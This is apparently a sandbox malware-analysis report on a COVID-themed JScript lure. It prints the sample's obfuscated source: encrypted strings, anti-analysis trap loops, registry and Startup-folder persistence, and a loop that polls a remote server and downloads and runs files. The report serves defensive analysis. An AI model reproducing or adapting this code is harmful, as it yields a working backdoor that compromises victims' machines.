Analysis Report COVID_19_Test_Result_Doctor_Note.js
Overview
General Information
Detection
Score: | 52 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Source: | Process Stats: |
Source: | Initial sample: |
Source: | Classification label: |
Source: | Key opened: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Data Obfuscation: |
---|
Potential obfuscated javascript found | Show sources |
Source: | Initial file: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion: |
---|
JavaScript source code contains call to eval() to check own source code (likely for evading instrumentation) | Show sources |
Source: | Check function source code vs Regexp: | Go to definition |
Source: | Window found: | Jump to behavior |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Anti Debugging: |
---|
Found potential dummy code loops (likely to delay analysis) | Show sources |
Source: | Process Stats: |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Source: | Key value queried: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting22 | Path Interception | Path Interception | Virtualization/Sandbox Evasion11 | OS Credential Dumping | Security Software Discovery2 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting22 | LSASS Memory | Virtualization/Sandbox Evasion11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 365159 |
Start date: | 09.03.2021 |
Start time: | 09:12:25 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 9s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | COVID_19_Test_Result_Doctor_Note.js |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 27 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal52.evad.winJS@1/0@0/0 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
No created / dropped files found |
---|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 5.728503884778436 |
TrID: |
|
File name: | COVID_19_Test_Result_Doctor_Note.js |
File size: | 13478 |
MD5: | 0bca3422ec870f28791d61a4fa25367f |
SHA1: | 36352478af11cdd59c55b8ef8ecf2cfacb2dcaaa |
SHA256: | 7703889f1b2c6fd8a1fe0abc4a8b6a409d4e6eabe5943c4a5261dfc68fb973f6 |
SHA512: | bcaeb9faad34f88a8a7392743a8d71eb793eb865f17c3b2232ddb28066a5959e14f476dcffd26901a79e3cf1b8cee05deb96e06d9da6693b7958d1b3915d92d3 |
SSDEEP: | 384:90DjR41HSTJwGFP4NK4lKm5+tbK4vgDDr843x7z/RjozIFY:9ajy1yT1FP4NnlKztbnMDr8uxnRjAIFY |
File Content Preview: | //***ERROR DECODING SIGNATURE FOR PATIENT ***//..//***ERROR OUTPUT***//....var _0x39e5=['mCozt8kWW4eQEG','CNvU','W53dQmk9cmoWC0Krl3y','mZq2odK1DNLpAwXg','u2W2ymoJWQCPW5C','DgvZDa','rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ','mty2mZe2u0DUq1z3','mJG4odi0q0HOAfbJ','y |
File Icon |
---|
Icon Hash: | e8d69ece968a9ec4 |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
System Behavior |
---|
General |
---|
Start time: | 09:13:10 |
Start date: | 09/03/2021 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7deb40000 |
File size: | 163840 bytes |
MD5 hash: | 9A68ADD12EB50DDE7586782C3EB9FF9C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Script: |
---|
Code | ||
---|---|---|
// Obfuscator string table. Every string the script needs at runtime (ActiveX
// ProgIDs, method names, registry paths, the `gate` URL and `user_agent` used by
// getCommand) is stored here base64-encoded -- and, for entries resolved through
// `_0x1fc1`, additionally RC4-encrypted -- and is looked up through `_0x26ae` /
// `_0x1fc1`. The IIFE below rotates this array until a checksum over selected
// entries equals 0x469ee, so call-site indexes only line up after that rotation.
// Plaintext values are not visible in this listing; static triage of the sample
// should start by decoding this table.
0 | var _0x39e5 = [ 'mCozt8kWW4eQEG', 'CNvU', 'W53dQmk9cmoWC0Krl3y', 'mZq2odK1DNLpAwXg', 'u2W2ymoJWQCPW5C', 'DgvZDa', 'rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ', 'mty2mZe2u0DUq1z3', 'mJG4odi0q0HOAfbJ', 'ybpdShBdI8o/mdvSWRTG', 'jvrftvaL', 'WPRcJSk5WPdcPCksmSkyW6BdJComW4u9vG', 'C2vUza', 'WRhdVmoDc8o3W5zo', 'y2HHCKf0', 'WORcKCkSWORcQSkAmSkB', 'F8kLW40M', 'vxnLCI1bz2vUDa', 'z3zcW5FcVCoOECkBW6xcQCk2gI3dG01L', 'Aw5WDxq', 'CxvPDa', 'cSkTdmoA', 'W7KoWRlcQvpdOmkku8k7cNObb8o6W5fGWPNcImkfW4OKgCofzG', 'D3nJCMLWDc5LEguGlY9cia', 'uMvNuMvHza', 'W5xcRHpcMmooWR9jWPWvts8', 'B3bLBG', 'BgvUz3rO', 'WO1dAhxcSW', 'ytL3WP/cK8oHWO12beqi', 'zNjVBunOyxjdB2rL', 'WPKBohVcU8ohW7azW7eXWO0', 'WR0GW7ddVSoUW7uObfhdHCoZWQn3W4/cRYHAW5VcKCkkW5SFafagWQfiFCkMA8k1W4BdNHpcLCoDrLJdVSkYWPxcGZRcPgS', 'tw96AwXSys81lJaGkfDPBMrVD3mGtLqGmtaUmdSGv2LUnJq7ihG2ncKGqxbWBgvxzwjlAxqVntm3lJm2icHlsfrntcWGBgLRzsbhzwnRBYKGq2HYB21LlZG4lJaUndmYnc4XntaGu2fMyxjPlZuZnY4ZnIbfzgCVodGUmc43mduUnJm', 'ftRdKq3dNa', 'W4DpyI/dTSow', 'C3rHCNr1Ca', 'otG4mdDgB1b2ueW', 'WO7dVW3dSZtcUq', 'g8ocieBdPCkMWQ17tmkSpG', 'uKvhx1nA', 'y2fSBa', 'hSk6bCobBW', 'cx3dQCkHsZq', 'WRRdVmohomoQW5m', 'WOtdP8klaSo5mSkyoK/dJqi6', 'mteYnJqZt1PHveHh', 'hSkPg8obAWKhW7uItW', 'C2nYAxb0BMfTzq', 'W4PAFctdUW', 'i2iWW4BdLCorWRLXj0m', 'CMvND3jPDgu', 'WOlcRCo0eCoF', 'tvnytuWYlLnLCNzLCLHnteHuvfa', 'Aw5PDa', 'y2HHAw4', 'ywjJzgvMmdeYmZq1nJC4oq', 'W5FcVSorrCo1', 'CMvWBgfJzq', 'ac/dKHu', 'WONdTsTzvCo6jxq', 'oI8V', 'C2nYAxb0zNvSBg5HBwu', 'CMvZCg9UC2vuzxH0', 'q29UDgvUDc1uExbL', 'gNmZW5WpxMj6tG', 'W4NcPW9HDCoalNyWwSodvq', 'W5hdR1G', 'leSr', 'zgvIDq', 'seTdvvXtB2z0D2fYzvXIB2X0xeDvsuq', 'ue9tva', 'jvvtrVjoqu1fjq', 'W4ZdKSoYes/dTCkXWRXTWRGD', 'y29UC3rYDwn0B3i', 'C3bSAxq', 'sSkNW48qWQ/dGmosp8kO', 'muPSufz4sa', 'W6tdI2iVlY8', 'W7btwSoMWPNcICogncecEmk3', 'W6BdGmkmnmoCDeGwnMtcPrxdM8osag7dRGTkW6/cLt0+W5/cIgdcKHK+fx/cRmkFrL3cRwldRtxcLSoGECo3ggxcIrdcUmo4WPtcGG', 'C2f2zxrVzMLSzq', 'WRihhmkcW4JdI8o8cZmIEmkvWO3cRrBdLq', 'yxbWBgLJyxrPB24VEc13D3CTzM9YBs11CMXLBMnVzgvK', 'oLZdQfSSDW', 
'D3nJCMLWDc5ZAgvSBa', 'zMXVB3i', 'WP7cJmk1WOFcQq', 'xNXUkSkbWPmC', 'z2PaW5hcUSkU', 'W6CdlYOiW7XHps3dUmk8W7S' ]; | |
// String resolver #1: maps a table index (offset by 0x136) to its plaintext by
// base64-decoding the `_0x39e5` entry on first use and memoizing it. The cache-miss
// path also carries an anti-beautify trap (see below), which is what the report
// flags as "check function source code vs Regexp" and "dummy code loops".
// The second parameter is not used by this resolver.
1 | var _0x26ae = function (_0x2929da, _0x18bd1c) { | |
2 | _0x2929da = _0x2929da - 0x136; | |
3 | var _0x387f06 = _0x39e5[_0x2929da]; | |
// One-time initialisation, guarded by the `wkROjH` flag.
4 | if ( _0x26ae['wkROjH'] === undefined ) | |
5 | { | |
// Hand-rolled base64 decoder: standard alphabet, 6-bit accumulator, ignores
// characters outside the alphabet (indexOf returns -1, and ~-1 is 0).
6 | var _0x2150f9 = function (_0x5a8350) { | |
7 | var _0x494982 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/='; | |
8 | var _0x39e5e0 = ''; | |
9 | for ( var _0x26ae68 = 0x0, _0x1fc186, _0x4ab90f, _0x3e72fb = 0x0 ; _0x4ab90f = _0x5a8350['charAt'] ( _0x3e72fb ++ ) ; ~ _0x4ab90f && ( _0x1fc186 = _0x26ae68 % 0x4 ? _0x1fc186 * 0x40 + _0x4ab90f : _0x4ab90f, _0x26ae68 ++ % 0x4 ) ? _0x39e5e0 += String['fromCharCode'] ( 0xff & _0x1fc186 >> ( - 0x2 * _0x26ae68 & 0x6 ) ) : 0x0 ) | |
10 | { | |
11 | _0x4ab90f = _0x494982['indexOf'] ( _0x4ab90f ); | |
12 | } | |
13 | return _0x39e5e0; | |
14 | }; | |
// `xYSHEi`: base64-decode, then %XX-encode every byte and run decodeURIComponent,
// i.e. interpret the decoded bytes as UTF-8 text.
15 | _0x26ae['xYSHEi'] = | |
16 | function (_0x2a30ac) { | |
17 | var _0x2d8802 = _0x2150f9 ( _0x2a30ac ); | |
18 | var _0x40f67c = []; | |
19 | for ( var _0x2d6e36 = 0x0, _0x39a245 = _0x2d8802['length'] ; _0x2d6e36 < _0x39a245 ; _0x2d6e36 ++ ) | |
20 | { | |
21 | _0x40f67c += '%' + ( '00' + _0x2d8802['charCodeAt'] ( _0x2d6e36 ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 ); | |
22 | } | |
23 | return decodeURIComponent ( _0x40f67c ); | |
24 | }, | |
// `DaINLR` is the memo cache; `wkROjH` = !![] = true marks initialisation done.
25 | _0x26ae['DaINLR'] = | |
26 | { | |
27 | }, _0x26ae['wkROjH'] = ! ! []; | |
28 | } | |
// Cache key = index + the (post-rotation) first table entry.
29 | var _0x2c1167 = _0x39e5[0x0], _0x30f503 = _0x2929da + _0x2c1167, _0x38ac6c = _0x26ae['DaINLR'][_0x30f503]; | |
30 | if ( _0x38ac6c === undefined ) | |
31 | { | |
// Anti-beautify check. `lcaTHf` is a tiny function returning 'newState';
// `NiMMBI` + `KKqzjK` form the regex  \w+ *\(\) *{\w+ *['|"].+['|"];? *}  which
// matches that function's toString() only while no line breaks have been inserted
// between its tokens. A match decrements PRTrKK[1] (-> -1, the "untouched" path);
// a mismatch decrements PRTrKK[0] (-> 0) and leads into the trap below.
32 | var _0x364960 = function (_0x41273d) {
|
33 | this['FJMtUj'] = _0x41273d, this['PRTrKK'] = [ 0x1, 0x0, 0x0 ], | |
34 | this['lcaTHf'] = | |
35 | function () { | |
36 | return 'newState'; | |
37 | }, this['NiMMBI'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*', this['KKqzjK'] = '[\x27|\x22].+[\x27|\x22];?\x20*}'; | |
38 | }; | |
39 | _0x364960['prototype']['dAYrWi'] = | |
40 | function () { | |
41 | var _0x43f378 = new RegExp ( this['NiMMBI'] + this['KKqzjK'] ), _0x34b6d1 = _0x43f378['test'] ( this['lcaTHf']['toString'] ( ) ) ? -- this['PRTrKK'][0x1] : -- this['PRTrKK'][0x0];
|
42 | return this['lLjveu'] ( _0x34b6d1 );
|
43 | }, | |
44 | _0x364960['prototype']['lLjveu'] = | |
// ~(-1) === 0, so only the -1 result returns here; any other value enters xyNHXg.
45 | function (_0x4d31de) {
|
46 | if ( ! Boolean ( ~ _0x4d31de ) )
|
47 | return _0x4d31de; | |
48 | return this['xyNHXg'] ( this['FJMtUj'] );
|
49 | }, | |
50 | _0x364960['prototype']['xyNHXg'] = | |
// Trap loop: the bound is re-read after every push, so the loop does not end on
// its own (this is the "dummy code loop" named in the report).
51 | function (_0x553279) {
|
52 | for ( var _0x3534fb = 0x0, _0x3c82a3 = this['PRTrKK']['length'] ; _0x3534fb < _0x3c82a3 ; _0x3534fb ++ ) | |
53 | { | |
54 | this['PRTrKK']['push'] ( Math['round'] ( Math['random'] ( ) ) ), _0x3c82a3 = this['PRTrKK']['length'];
|
55 | } | |
56 | return _0x553279 ( this['PRTrKK'][0x0] ); | |
// Run the check, decode the entry and cache it. Unlike `_0x1fc1`, the check runs on
// every cache miss here, not just once.
57 | }, new _0x364960 ( _0x26ae ) ['dAYrWi'] ( ), _0x387f06 = _0x26ae['xYSHEi'] ( _0x387f06 ), _0x26ae['DaINLR'][_0x30f503] = _0x387f06; | |
58 | } | |
59 | else | |
60 | _0x387f06 = _0x38ac6c; | |
61 | return _0x387f06; | |
62 | }; | |
// String resolver #2: same index/cache scheme as `_0x26ae`, but each entry is
// base64 -> UTF-8 decoded and then RC4-decrypted with the per-call-site key passed
// as the second argument (e.g. `_0x1fc1(0x189, '01)r')`). Results are memoized
// in `tEpTFs`, so the anti-beautify check runs only once (`gqdguA` flag).
63 | var _0x1fc1 = function (_0x2929da, _0x18bd1c) { | |
64 | _0x2929da = _0x2929da - 0x136; | |
65 | var _0x387f06 = _0x39e5[_0x2929da]; | |
66 | if ( _0x1fc1['APyrWQ'] === undefined ) | |
67 | { | |
// Same hand-rolled base64 decoder as in `_0x26ae`, with the locals renamed.
68 | var _0x2150f9 = function (_0x494982) { | |
69 | var _0x39e5e0 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/='; | |
70 | var _0x26ae68 = ''; | |
71 | for ( var _0x1fc186 = 0x0, _0x4ab90f, _0x3e72fb, _0x2a30ac = 0x0 ; _0x3e72fb = _0x494982['charAt'] ( _0x2a30ac ++ ) ; ~ _0x3e72fb && ( _0x4ab90f = _0x1fc186 % 0x4 ? _0x4ab90f * 0x40 + _0x3e72fb : _0x3e72fb, _0x1fc186 ++ % 0x4 ) ? _0x26ae68 += String['fromCharCode'] ( 0xff & _0x4ab90f >> ( - 0x2 * _0x1fc186 & 0x6 ) ) : 0x0 ) | |
72 | { | |
73 | _0x3e72fb = _0x39e5e0['indexOf'] ( _0x3e72fb ); | |
74 | } | |
75 | return _0x26ae68; | |
76 | }; | |
// RC4 decrypt(ciphertext-base64, key): base64 + UTF-8 decode, 256-byte key
// schedule, then XOR with the keystream.
77 | var _0x5a8350 = function (_0x2d8802, _0x40f67c) { | |
78 | var _0x2d6e36 = [], _0x39a245 = 0x0, _0x364960, _0x41273d = '', _0x43f378 = ''; | |
79 | _0x2d8802 = _0x2150f9 ( _0x2d8802 ); | |
80 | for ( var _0x4d31de = 0x0, _0x553279 = _0x2d8802['length'] ; _0x4d31de < _0x553279 ; _0x4d31de ++ ) | |
81 | { | |
82 | _0x43f378 += '%' + ( '00' + _0x2d8802['charCodeAt'] ( _0x4d31de ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 ); | |
83 | } | |
84 | _0x2d8802 = decodeURIComponent ( _0x43f378 ); | |
85 | var _0x34b6d1; | |
// Key-scheduling: identity S-box, then j = (j + S[i] + key[i mod keylen]) mod 256, swap.
86 | for ( _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x100 ; _0x34b6d1 ++ ) | |
87 | { | |
88 | _0x2d6e36[_0x34b6d1] = _0x34b6d1; | |
89 | } | |
90 | for ( _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x100 ; _0x34b6d1 ++ ) | |
91 | { | |
92 | _0x39a245 = ( _0x39a245 + _0x2d6e36[_0x34b6d1] + _0x40f67c['charCodeAt'] ( _0x34b6d1 % _0x40f67c['length'] ) ) % 0x100, _0x364960 = _0x2d6e36[_0x34b6d1], _0x2d6e36[_0x34b6d1] = _0x2d6e36[_0x39a245], _0x2d6e36[_0x39a245] = _0x364960; | |
93 | } | |
94 | _0x34b6d1 = 0x0, _0x39a245 = 0x0; | |
// Keystream generation: i = i+1, j = j+S[i] (mod 256), swap, output byte XOR S[(S[i]+S[j]) mod 256].
95 | for ( var _0x3534fb = 0x0 ; _0x3534fb < _0x2d8802['length'] ; _0x3534fb ++ ) | |
96 | { | |
97 | _0x34b6d1 = ( _0x34b6d1 + 0x1 ) % 0x100, _0x39a245 = ( _0x39a245 + _0x2d6e36[_0x34b6d1] ) % 0x100, _0x364960 = _0x2d6e36[_0x34b6d1], _0x2d6e36[_0x34b6d1] = _0x2d6e36[_0x39a245], _0x2d6e36[_0x39a245] = _0x364960, _0x41273d += String['fromCharCode'] ( _0x2d8802['charCodeAt'] ( _0x3534fb ) ^ _0x2d6e36[( _0x2d6e36[_0x34b6d1] + _0x2d6e36[_0x39a245] ) % 0x100] ); | |
98 | } | |
99 | return _0x41273d; | |
100 | }; | |
// `xeclEU` = decrypt routine, `tEpTFs` = memo cache, `APyrWQ` = init-done flag.
101 | _0x1fc1['xeclEU'] = _0x5a8350, | |
102 | _0x1fc1['tEpTFs'] = | |
103 | { | |
104 | }, _0x1fc1['APyrWQ'] = ! ! []; | |
105 | } | |
106 | var _0x2c1167 = _0x39e5[0x0], _0x30f503 = _0x2929da + _0x2c1167, _0x38ac6c = _0x1fc1['tEpTFs'][_0x30f503]; | |
107 | if ( _0x38ac6c === undefined ) | |
108 | { | |
// One-time anti-beautify check, structurally identical to the one in `_0x26ae`:
// a regex over the toString() of a one-line function, with a never-ending push
// loop (`gTYFtX`) as the penalty when the source has been reformatted.
109 | if ( _0x1fc1['gqdguA'] === undefined ) | |
110 | { | |
111 | var _0x3c82a3 = function (_0x2cc4e4) { | |
112 | this['dFGFPT'] = _0x2cc4e4, this['erFzXo'] = [ 0x1, 0x0, 0x0 ], | |
113 | this['KtfqmL'] = | |
114 | function () { | |
115 | return 'newState'; | |
116 | }, this['zGDTQe'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*', this['HjrHjW'] = '[\x27|\x22].+[\x27|\x22];?\x20*}'; | |
117 | }; | |
118 | _0x3c82a3['prototype']['NiMncb'] = | |
119 | function () { | |
120 | var _0x1ea5df = new RegExp ( this['zGDTQe'] + this['HjrHjW'] ), _0x3d06b9 = _0x1ea5df['test'] ( this['KtfqmL']['toString'] ( ) ) ? -- this['erFzXo'][0x1] : -- this['erFzXo'][0x0]; | |
121 | return this['rKZMXc'] ( _0x3d06b9 ); | |
122 | }, | |
123 | _0x3c82a3['prototype']['rKZMXc'] = | |
124 | function (_0x415288) { | |
125 | if ( ! Boolean ( ~ _0x415288 ) ) | |
126 | return _0x415288; | |
127 | return this['gTYFtX'] ( this['dFGFPT'] ); | |
128 | }, | |
129 | _0x3c82a3['prototype']['gTYFtX'] = | |
130 | function (_0x477ace) { | |
131 | for ( var _0x115c69 = 0x0, _0x3fb45b = this['erFzXo']['length'] ; _0x115c69 < _0x3fb45b ; _0x115c69 ++ ) | |
132 | { | |
133 | this['erFzXo']['push'] ( Math['round'] ( Math['random'] ( ) ) ), _0x3fb45b = this['erFzXo']['length']; | |
134 | } | |
135 | return _0x477ace ( this['erFzXo'][0x0] ); | |
136 | }, new _0x3c82a3 ( _0x1fc1 ) ['NiMncb'] ( ), _0x1fc1['gqdguA'] = ! ! []; | |
137 | } | |
// Decrypt with the call-site key and memoize.
138 | _0x387f06 = _0x1fc1['xeclEU'] ( _0x387f06, _0x18bd1c ), _0x1fc1['tEpTFs'][_0x30f503] = _0x387f06; | |
139 | } | |
140 | else | |
141 | _0x387f06 = _0x38ac6c; | |
142 | return _0x387f06; | |
143 | }; | |
// Short aliases used by every function below: `_0x4f83db(idx, key)` is the
// RC4+base64 resolver, `_0x5abc4a(idx)` the base64-only resolver.
144 | var _0x4f83db = _0x1fc1, _0x5abc4a = _0x26ae; | |
// Table alignment: rotate `_0x39e5` (push(shift())) until a signed sum of
// parseInt() over nine resolved entries equals 0x469ee (289262). A resolver
// exception also rotates, so the loop exits only on the intended alignment.
145 | ( function (_0x21ce3b, _0x4d5b36) {
|
146 | var _0x3ba741 = _0x1fc1, _0x37524d = _0x26ae; | |
147 | while (! ! [ ] ) | |
148 | { | |
149 | try | |
150 | { | |
151 | var _0x469b11 = - parseInt ( _0x37524d ( '0x18d' ) ) + - parseInt ( _0x37524d ( 0x154 ) ) + parseInt ( _0x3ba741 ( 0x189, '01)r' ) ) + - parseInt ( _0x3ba741 ( 0x14e, 'DH)J' ) ) * parseInt ( _0x3ba741 ( 0x18a, '^Bvv' ) ) + - parseInt ( _0x37524d ( 0x15d ) ) * parseInt ( _0x37524d ( '0x17c' ) ) + parseInt ( _0x37524d ( '0x136' ) ) + - parseInt ( _0x3ba741 ( 0x14c, '$G#%' ) ) * - parseInt ( _0x3ba741 ( 0x18e, 'OvA7' ) );
|
152 | if ( _0x469b11 === _0x4d5b36 ) | |
153 | break ; | |
154 | else | |
155 | _0x21ce3b['push'] ( _0x21ce3b['shift'] ( ) ); | |
156 | } | |
157 | catch ( _0x4718c2 ) | |
158 | { | |
159 | _0x21ce3b['push'] ( _0x21ce3b['shift'] ( ) ); | |
160 | } | |
161 | } | |
162 | } ( _0x39e5, 0x469ee ) ); | |
// Global configuration. Only the plaintext parts are readable here:
// `filesystemobj` is a Scripting.FileSystemObject; `shellobj`'s ProgID is a table
// string but the plaintext `expandenvironmentstrings` / `RegWrite` / `regdelete`
// calls on it identify a WScript.Shell; `startup`, `installdir` and `temp` are
// shell/environment lookups with a trailing backslash ('\x5c'); `SaveSettings`,
// `HKCU`, `gate` and `user_agent` are table strings (a registry value path, a key
// prefix, the beacon URL and its User-Agent, presumably -- confirm by decoding);
// `time` = 0xea60 = 60000 ms.
163 | var SaveSettings = _0x5abc4a ( 0x175 ), shellobj = new ActiveXObject ( _0x5abc4a ( '0x184' ) ), filesystemobj = new ActiveXObject ( 'scripting.filesystemobject' ), HKCU = _0x4f83db ( 0x17f, '[mYd' ), startup = shellobj[_0x4f83db ( 0x13a, '^EhX' ) ] ( _0x5abc4a ( 0x153 ) ) + '\x5c', installdir = shellobj['expandenvironmentstrings'] ( _0x4f83db ( 0x170, '#LM8' ) ) + '\x5c', temp = shellobj[_0x5abc4a ( 0x190 ) ] ( _0x5abc4a ( '0x139' ) ) + '\x5c', gate = _0x4f83db ( '0x14f', 'v3Qe' ), user_agent = _0x5abc4a ( '0x150' ), time = 0xea60; | |
// Main loop, never exits: (re)install persistence, poll `gate` for one command,
// busy-wait ~60 s (see sleep()). Function declarations below are hoisted.
164 | do | |
165 | { | |
166 | install ( ), getCommand ( ), sleep ( time ); | |
167 | } | |
168 | while( ! ! [ ] ) | |
// Fetches a URL with Microsoft.XMLHTTP, writes the body to disk through
// ADODB.Stream and then passes the path to a `shellobj` method whose name is a
// table string (the function's own name and the report's classification point to
// execution). Mode 1 (`_0x3e72fb == 1`) targets a `WSH` property -- the same table
// index install() copies from, presumably the script's own path; mode 0 targets
// `temp` + 8 random chars + the URL's last four characters.
169 | function Download_exec(_0x4ab90f, _0x3e72fb) { | |
170 | var _0x1071d9 = _0x4f83db, _0xbf514b = _0x5abc4a; | |
// If the argument lacks a decoded marker (likely a URL scheme), rebuild it
// from `gate`: split on '/' and replace the last segment (index 0x17a is used
// with '/', '|' and '.' separators elsewhere, consistent with split).
171 | if ( _0x4ab90f['indexOf'] ( _0xbf514b ( '0x16c' ) ) < 0x0 ) | |
172 | var _0x2a30ac = gate[_0xbf514b ( '0x17a' ) ] ( '/' ), _0x4ab90f = gate[_0xbf514b ( 0x169 ) ] ( _0x2a30ac[_0x2a30ac['length'] - 0x1], _0x1071d9 ( 0x188, '9fc#' ) + _0x4ab90f ); | |
173 | var _0x2d8802 = new ActiveXObject ( 'Microsoft.XMLHTTP' ), _0x40f67c = new ActiveXObject ( 'ADODB.Stream' ); | |
174 | if ( _0x3e72fb == 0x1 ) | |
175 | var _0x2d6e36 = WSH[_0xbf514b ( 0x16d ) ]; | |
176 | else | |
177 | { | |
// Extension = last 4 characters of the URL; 8-character random name drawn
// from a decoded character set.
178 | var _0x39a245 = _0x4ab90f[_0x1071d9 ( '0x155', 'C^uH' ) ] ( _0x4ab90f[_0x1071d9 ( '0x15b', 'tSe#' ) ] - 0x4, _0x4ab90f[_0xbf514b ( '0x14a' ) ] ), _0x364960 = '', _0x41273d = _0xbf514b ( '0x167' ), _0x43f378 = _0x41273d[_0xbf514b ( 0x14a ) ]; | |
179 | for ( var _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x8 ; _0x34b6d1 ++ ) | |
180 | { | |
181 | _0x364960 += _0x41273d[_0xbf514b ( 0x13d ) ] ( Math[_0xbf514b ( 0x185 ) ] ( Math[_0x1071d9 ( '0x17d', '874s' ) ] ( ) * _0x43f378 ) ); | |
182 | } | |
183 | var _0x2d6e36 = temp + _0x364960 + _0x39a245; | |
184 | } | |
// Synchronous request (third argument ![] = false), then stream.type = 1
// (binary), write the response and save to the path with flag 2; the method
// names are resolved at runtime but the argument shapes match XMLHTTP open/send
// and ADODB.Stream Write/SaveToFile (2 = overwrite).
185 | _0x2d8802[_0xbf514b ( 0x149 ) ] ( _0x1071d9 ( 0x172, '874s' ), _0x4ab90f, ! [] ), _0x2d8802[_0xbf514b ( '0x13b' ) ] ( ), _0x40f67c['type'] = 0x1, _0x40f67c[_0xbf514b ( '0x149' ) ], _0x40f67c[_0x1071d9 ( 0x186, '^EhX' ) ] ( _0x2d8802[_0x1071d9 ( 0x171, 'vnI1' ) ] ), _0x40f67c[_0xbf514b ( '0x180' ) ] ( _0x2d6e36, 0x2 ); | |
// Hand the written file to the shell; any failure is swallowed.
186 | try | |
187 | { | |
188 | shellobj[_0xbf514b ( '0x18b' ) ] ( _0x2d6e36 ); | |
189 | } | |
190 | catch ( _0x4d31de ) | |
191 | { | |
192 | } | |
193 | } | |
// Persistence, re-run every loop iteration. Writes a registry value under
// `HKCU` + <script name without extension> whose data is a decoded prefix plus
// the install path in double quotes (String.fromCharCode(0x22)), then copies the
// running script (`WSH['scriptfullname']`) into `installdir` and into `startup`
// (the second copy uses the plaintext `copyfile`). The registry method name is a
// table string; getCommand's case '19' removes the same key with `regdelete`, so
// this is presumably a RegWrite -- confirm by decoding. Failures are swallowed.
// Detection hints: wscript.exe writing HKCU plus two copies of a .js into the
// Startup folder and an environment-derived directory.
194 | function install() { | |
195 | var _0x2ca4f5 = _0x4f83db, _0x22499d = _0x5abc4a, _0x553279 = _0x22499d ( 0x146 ); | |
196 | try | |
197 | { | |
198 | shellobj[_0x22499d ( 0x162 ) ] ( HKCU + WSH[_0x22499d ( '0x15f' ) ][_0x2ca4f5 ( 0x159, 'ySE2' ) ] ( '.' ) [0x0], _0x553279 + String[_0x22499d ( 0x14d ) ] ( 0x22 ) + installdir + WSH[_0x2ca4f5 ( 0x18c, '[mYd' ) ] + String['fromCharCode'] ( 0x22 ), _0x22499d ( 0x157 ) ), filesystemobj[_0x2ca4f5 ( 0x13e, '^EhX' ) ] ( WSH['scriptfullname'], installdir + WSH[_0x22499d ( 0x15f ) ], ! ! [] ), filesystemobj['copyfile'] ( WSH[_0x22499d ( '0x16d' ) ], startup + WSH[_0x2ca4f5 ( 0x15e, 'ySE2' ) ], ! ! [] ); | |
199 | } | |
200 | catch ( _0x3534fb ) | |
201 | { | |
202 | } | |
